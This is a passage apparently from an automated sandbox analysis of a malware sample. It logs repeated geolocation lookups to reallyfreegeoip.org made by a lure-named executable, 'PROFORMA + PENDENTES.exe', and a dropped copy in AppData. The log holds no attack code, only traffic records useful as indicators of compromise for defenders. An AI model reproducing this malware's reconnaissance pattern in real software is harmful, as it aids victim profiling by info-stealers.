                                            2024-11-18 17:18:48 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.849716188.114.97.34433636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:18:49 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-11-18 17:18:49 UTC848INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:49 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 6367
                                            Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HFbEpdPktL5H3JEyHtfotIDxuwPD1YXvBcVzmbZ6gFAPy8z%2BvQ%2Fx2t6bNbo2V8sJtoyee3bl8NOoEPtg6i7VJ12epEJOvub2dSmcMAS8m4Ve%2FGpzbxM86i0z7EUpMfmamWBO00bu"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f39bddfbf69-ATL
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=17813&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=162943&cwnd=32&unsent_bytes=0&cid=029d0e3caf688df2&ts=189&x=0"
                                            2024-11-18 17:18:49 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.849720188.114.97.34433636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:18:51 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-11-18 17:18:51 UTC849INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:51 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 399
                                            Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i6PIT%2BCkcIXWV0ZiRcXSn7z8cCtvoAlTTdRXX7MqFS3%2Bf5LXgOZbut4j9JQ4PPfuJw%2F5DG9f3UrHh%2BTVIzjZZAUtdiayGN5LZKvvNExDnAfG0O59jlZBzWkRZQREM8jaZ9thFqOn"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f435faee81c-ORD
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=23774&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=122753&cwnd=32&unsent_bytes=0&cid=227d9ba8ce957e17&ts=175&x=0"
                                            2024-11-18 17:18:51 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.849719188.114.97.34435420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:18:51 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-11-18 17:18:51 UTC845INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:51 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 399
                                            Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mC46mNS5Ghy1lzbha7Mdx6T376FFPgOoBhHdlAWK%2BTMVLVzR1SoZpHPSyMT30AJgrkzM%2F3w7EbNy4lb6IixCWXYkTVBSetU47V2WQ4615EHgGLV6oMa1eHXmrCwGVsPnayizFLGv"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f438b4486ed-ORD
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=24510&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=118348&cwnd=32&unsent_bytes=0&cid=e418ecd43100f3fc&ts=236&x=0"
                                            2024-11-18 17:18:51 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.849722188.114.97.34435420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:18:52 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-11-18 17:18:52 UTC847INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:52 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 51806
                                            Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8B5esH54PfrwmLC8hdXx42PAX2SZ3TS5VV28aL0DV7%2FY42SzwIXiNRSw5oH3vwRX2dZ%2B6RQVnuxzvPfm2vvSsnMu0PKbgyfsySjkV4CtjwScDK8Wfc4KeprOzFEZhqElbbCdmNrF"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f49bf33e76b-DEN
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=19057&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=152453&cwnd=32&unsent_bytes=0&cid=344edee40fd27122&ts=168&x=0"
                                            2024-11-18 17:18:52 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.849723188.114.97.34433636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:18:52 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-11-18 17:18:52 UTC851INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:52 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 51806
                                            Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t0PsM9vo2zYweYDpGwEhMtykfnbZ8S4pSSxhFAEjdVuU43m%2B438zoE5ST9h9h9mCkxbwZx7yoHeTsZ3s6aQy%2BvpQlQLpUTdKvrQ5h6zdadEI9%2BnOZ%2FoumxYIb6tf3JmnzqYEaLvb"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f4c8a21e757-DEN
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=18784&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=154132&cwnd=32&unsent_bytes=0&cid=a7eeaaea0c8dafe9&ts=162&x=0"
                                            2024-11-18 17:18:52 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.849727188.114.97.34435420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:18:54 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-11-18 17:18:54 UTC854INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:54 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 51817
                                            Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wykWLrjXHP%2FlgaUWhiUnAl0g2RTRJd1tYhgomkwoI%2Bvxm0rQCFd83ro%2B8t4ivtSb2yZGGcHc%2BS8NT7SQscOTLkQdX6d77E9s6dspZtFB%2BQpaQgsWIREglpYpxEqRL0XjfJttwbkv"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f542e782848-DFW
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1612472&cwnd=251&unsent_bytes=0&cid=ace4c9230a4276a9&ts=159&x=0"
                                            2024-11-18 17:18:54 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.849729188.114.97.34433636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:18:54 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-11-18 17:18:54 UTC849INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:54 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 402
                                            Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k60Z6YuIGWwHHKw0UxOKIy6dQZHzBF%2Bt6u2y%2F3ix9Rncv9G43ttQPCU5ZQjlywTNk%2Fpz41tuhzOgT7mH%2BwjYENUPH8J2JG5XJHKO8z3hIZyhb9sB7Th0fsmCP1ZGoZE5ChRzGGWf"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f55f98c6354-ORD
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=24846&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=116351&cwnd=32&unsent_bytes=0&cid=45b22792198b44a6&ts=176&x=0"
                                            2024-11-18 17:18:54 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.849734188.114.97.34435420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:18:55 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-11-18 17:18:55 UTC847INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:55 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 51809
                                            Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=krw6N05aTkdrFU3OO1PHyQBkPMmdF9OVSMXxxCfioE4YgdY%2BQS2JMzwvKx7Na6EwXLWBy9yGYBBYtaidXilVK7Liahnj%2FnMrU36yQqOG6SFc0Cbm0ckuwFmudNXmVL5ztEcIxKVm"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f5dbb43e73b-DEN
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=18814&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=153471&cwnd=32&unsent_bytes=0&cid=1f8a421a812da1e9&ts=196&x=0"
                                            2024-11-18 17:18:55 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.849735188.114.97.34433636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 17:18:55 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-11-18 17:18:56 UTC853INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:55 GMT
                                            Content-Type: text/xml
                                            Content-Length: 358
                                            Connection: close
                                            Cache-Control: max-age=31536000
                                            CF-Cache-Status: HIT
                                            Age: 403
                                            Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT
                                            Accept-Ranges: bytes
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GnaK8fw%2FfJd9qfyrO9RwttdFQJYIUbW4ZXnZyO%2BQQHIguUXxhRzpD3FKW7zSnAyhKqaetfwb%2FTglLivLanUO%2FXI%2FbNdbspJMFKOHorEGQmmm1GLvkpu%2BkL89IazYybnFhrE6uuQ6"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8e499f5f5eeee815-ORD
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=23377&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=123871&cwnd=32&unsent_bytes=0&cid=264770afc73ac6d6&ts=181&x=0"
                                            2024-11-18 17:18:56 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.849737188.114.97.34435420C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            TimestampBytes transferredDirectionData
